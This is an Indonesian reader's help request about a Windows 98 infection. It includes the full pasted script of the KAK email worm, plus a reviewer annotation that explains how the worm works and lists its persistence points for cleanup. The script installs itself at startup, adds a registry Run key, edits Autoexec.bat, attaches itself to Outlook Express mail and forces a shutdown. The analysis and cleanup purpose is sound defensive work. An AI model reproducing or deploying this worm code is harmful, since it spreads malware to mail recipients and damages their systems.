Komputer saya Pentium II 450 MHz, 64 MB. Setiap kali saya menjalankan
Windows 98, selalu terbentuk file kak.htm di folder C:\Windows. Pada
registry Windows juga tercatat adanya file kak di
HKEY_CURRENT_USER\IDENTITIES\SOFTWARE\MICROSOFT\OUTLOOK EXPRESS\5.0\SIGNATURES\00000000
dan juga di key
HKEY_USERS\DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\DOC FIND SPEC MRU.
Bila saya mencoba menghapus key-key tersebut dari registry dan juga menghapus
file kak.htm dari C:\Windows, lalu PC saya restart, file tersebut akan
terbentuk kembali seperti semula.
Sebelum ini kejadiannya lebih parah. Pada saat PC dinyalakan dan
Windows berjalan, muncul kotak dialog yang berisi kata-kata
"Kagou-Anti-Kro$oft says not today!". Bila tombol OK pada kotak dialog
tersebut diklik, maka Windows akan men-shutdown PC.
Oh ya, saya sudah mencoba men-scan PC saya dengan PC CILLIN 6.0 virus
pattern 586, dan dilaporkan tidak ada virus yang ditemukan. Bagaimana cara
mengatasi persoalan ini dan apa sebenarnya yang menimpa PC saya?
Berikut ini adalah kode HTML dari file kak.htm yang terbentuk di C:\Windows
pada PC saya:
<!--
  Reviewer annotation (added for analysis; not part of the file the poster found).
  The listing is shown as pasted into the mail: hard-wrapped in the middle of
  tokens and with mis-encoded accented characters, so it is for reading only.

  What the visible script does:
  * Outer page: sets scr.doc to an HTA document held in a string, sets scr.Path
    to ...StartUp\kak.hta (or the French-named Startup folder when the system
    language is "fr"), and calls scr.write() when the user agent contains "msie"
    and appVersion parses above 4, or contains "msie 5.".
  * The HTA, when it runs, builds <fic> from 8 characters of the last enumerated
    Identities subfolder name and, if C:\Windows\System\<fic>.hta does not exist,
    copies the Startup kak.hta there and sets Attributes=2 on it.
  * If C:\AE.KAK does not exist and the command line contains kak.hta, it copies
    C:\Autoexec.bat to C:\AE.KAK and appends two lines to Autoexec.bat that
    overwrite and then delete the Startup kak.hta.
  * Writes C:\Windows\kak.reg, imports it with "Regedit.exe -s", then deletes it.
    The .reg sets the Outlook Express 5.0 default signature to the file
    C:\WINDOWS\kak.htm ("Signature Flags"=3) and adds the value "cAg0u" under
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, pointing
    at the System\<fic>.hta copy.
  * Rewrites C:\Windows\kak.htm with content read from that copy and sets
    Attributes=2 on it.
  * When the day of the month is 1 and getHours() is above 17, shows the alert
    text and runs RUNDLL32.EXE user.exe,exitwindows.

  Why deleting kak.htm and the signature key alone does not last: the Run value
  starts the System\<fic>.hta copy at startup, and that copy writes both back.
  Artifacts to check during cleanup: the "cAg0u" Run value, the .hta file in
  C:\Windows\System, kak.hta in the Startup folder, C:\Windows\kak.htm, the
  Outlook Express signature settings, and the lines appended to C:\Autoexec.bat
  (C:\AE.KAK holds the copy taken before they were appended).
  NOTE(review): Attributes=2 presumably marks the files hidden, and the signature
  setting presumably attaches kak.htm to outgoing HTML mail; confirm both.
-->
<HTML><BODY><DIV
style="POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5"><OBJECT
classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC
id=scr></OBJECT></DIV><SCRIPT><!--
function sErr(){return
true;}window.onerror=sErr;scr.Reset();scr.doc="Z<HTML><HEAD><TITLE>Driver
Memory Error</"+"TITLE><HTA:APPLICATION ID=\"hO\"
WINDOWSTATE=Minimize></"+"HEAD><BODY BGCOLOR=#CCCCCC><object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></"+"object><SCRIPT>fun
ction sEr(){self.close();return true;}window.onerror=sEr;fs=new
ActiveXObject('Scripting.FileSystemObject');wd='C:\\\\Windows\\\\';fl=fs.Get
Folder(wd+'Applic~1\\\\Identities');sbf=fl.SubFolders;for(var mye=new
Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=mye.item();ids=new
String(idd);idn=ids.slice(31);fic=idn.substring(1,9);kfr=wd+'MENUD�~1\\\\PRO
GRA~1\\\\D�MARR~1\\\\kak.hta';ken=wd+'STARTM~1\\\\Programs\\\\StartUp\\\\kak
.hta';k2=wd+'System\\\\'+fic+'.hta';kk=(fs.FileExists(kfr))?kfr:ken;aek='C:\
\\\AE.KAK';aeb='C:\\\\Autoexec.bat';if(!fs.FileExists(aek)){re=/kak.hta/i;if
(hO.commandLine.search(re)!=-1){f1=fs.GetFile(aeb);f1.Copy(aek);t1=f1.OpenAs
TextStream(8);pth=(kk==kfr)?wd+'MENUD�~1\\\\PROGRA~1\\\\D�MARR~1\\\\kak.hta'
:ken;t1.WriteLine('@echo off>'+pth);t1.WriteLine('del
'+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFile(kk,k2);fs.GetFile(k2)
.Attributes=2;}t2=fs.CreateTextFile(wd+'kak.reg');t2.write('REGEDIT4');t2.Wr
iteBlankLines(2);ky='[HKEY_CURRENT_USER\\\\Identities\\\\'+idn+'\\\\Software
\\\\Microsoft\\\\Outlook
Express\\\\5.0';sg='\\\\signatures';t2.WriteLine(ky+sg+']');t2.Write('\"Defa
ult
Signature\"=\"00000000\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\\\000
00000]');t2.WriteLine('\"name\"=\"Signature
#1\"');t2.WriteLine('\"type\"=dword:00000002');t2.WriteLine('\"text\"=\"\"')
;t2.Write('\"file\"=\"C:\\\\\\\\WINDOWS\\\\\\\\kak.htm\"');t2.WriteBlankLine
s(2);t2.WriteLine(ky+']');t2.Write('\"Signature
Flags\"=dword:00000003');t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCAL_MAC
HINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run]');t2.Writ
e('\"cAg0u\"=\"C:\\\\\\\\WINDOWS\\\\\\\\SYSTEM\\\\\\\\'+fic+'.hta\"');t2.Wri
teBlankLines(2);t2.close();wsh.Run(wd+'Regedit.exe -s
'+wd+'kak.reg');t3=fs.CreateTextFile(wd+'kak.htm',1);t3.Write('<HTML><BODY><
DIV style=\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OBJECT
classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC
id=scr></"+"OBJECT></"+"DIV>');t4=fs.OpenTextFile(k2,1);while(t4.Read(1)!='Z
');t3.WriteLine('<SCRIPT><!--');t3.write('function sErr(){return
true;}window.onerror=sErr;scr.Reset();scr.doc=\"Z');rs=t4.Read(3095);t4.clos
e();rd=/\\\\/g;re=/\"/g;rf=/<\\//g;rt=rs.replace(rd,'\\\\\\\\').replace(re,'
\\\\\"').replace(rf,'</"+"\"+\"');t3.WriteLine(rt+'\";la=(navigator.systemLa
nguage)?navigator.systemLanguage:navigator.language;scr.Path=(la==\"fr\")?\"
C:\\\\\\\\windows\\\\\\\\Menu
D�marrer\\\\\\\\Programmes\\\\\\\\D�marrage\\\\\\\\kak.hta\":\"C:\\\\\\\\win
dows\\\\\\\\Start
Menu\\\\\\\\Programs\\\\\\\\StartUp\\\\\\\\kak.hta\";agt=navigator.userAgent
.toLowerCase();if(((agt.indexOf(\"msie\")!=-1)&&(parseInt(navigator.appVersi
on)>4))||(agt.indexOf(\"msie
.\")!=-1))scr.write();');t3.write('//  --></"+"'+'SCRIPT></"+"'+'OBJECT></"+
"'+'BODY></"+"'+'HTML>');t3.close();fs.GetFile(wd+'kak.htm').Attributes=2;fs
.DeleteFile(wd+'kak.reg');d=new Date();if(d.getDate()==1 &&
d.getHours()>17){alert('Kagou-Anti-Kro$oft says not today
!');wsh.Run(wd+'RUNDLL32.EXE
user.exe,exitwindows');}self.close();</"+"SCRIPT>S3 driver memory alloc
failed &nbsp;
!]]%%%%%</"+"BODY></"+"HTM";la=(navigator.systemLanguage)?navigator.systemLa
nguage:navigator.language;scr.Path=(la=="fr")?"C:\\windows\\Menu
D�marrer\\Programmes\\D�marrage\\kak.hta":"C:\\windows\\Start
Menu\\Programs\\StartUp\\kak.hta";agt=navigator.userAgent.toLowerCase();if((
(agt.indexOf("msie")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf
("msie 5.")!=-1))scr.write();
//  --></SCRIPT></OBJECT></BODY></HTML>


